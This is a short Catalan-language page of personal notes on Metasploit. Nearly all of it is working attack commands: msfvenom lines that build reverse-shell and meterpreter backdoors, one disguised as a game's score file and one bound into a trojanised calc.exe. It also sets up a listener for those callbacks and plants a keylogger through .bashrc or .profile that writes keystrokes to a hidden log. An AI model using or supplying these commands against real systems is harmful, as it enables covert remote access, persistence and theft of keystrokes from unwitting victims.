Noves instruccions per Metasploit

per Jordi Farrero — darrera modificació 2020-03-25T14:54:07+01:00

1) Creacio del EXE amb payload

Linux x86

root@kali:~# msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores

Windowsx86

root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

2) Listener del BACKDOOR

msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 172.16.104.130
LHOST => 172.16.104.130
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) 

exploit

3) Seguir instruccions de ASTROBABY

L'adreça de l'enllaç és: https://astr0baby.wordpress.com/2012/11/20/hacking-ubuntu-12-04-lts-using-metasploit/

4) UNA VEGADA MODIFICAT EL PUNT BASHRC O PROFILE POSEM EL KEY LOGGER

ENTRADA al bash.rc o .profile desde meterpreter>

#!/bin/bash
export DISPLAY=:0.0
sudo showkey >> /tmp/.xkey.log &

DECODER al del  .xkey.log


aqui

COM AFEGIR CARGA A UN EXE (No funciona be)

msfvenom -a x86 --platform Windows -x calcold.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -i 3 -b "\x00" -f exe -o calc.exe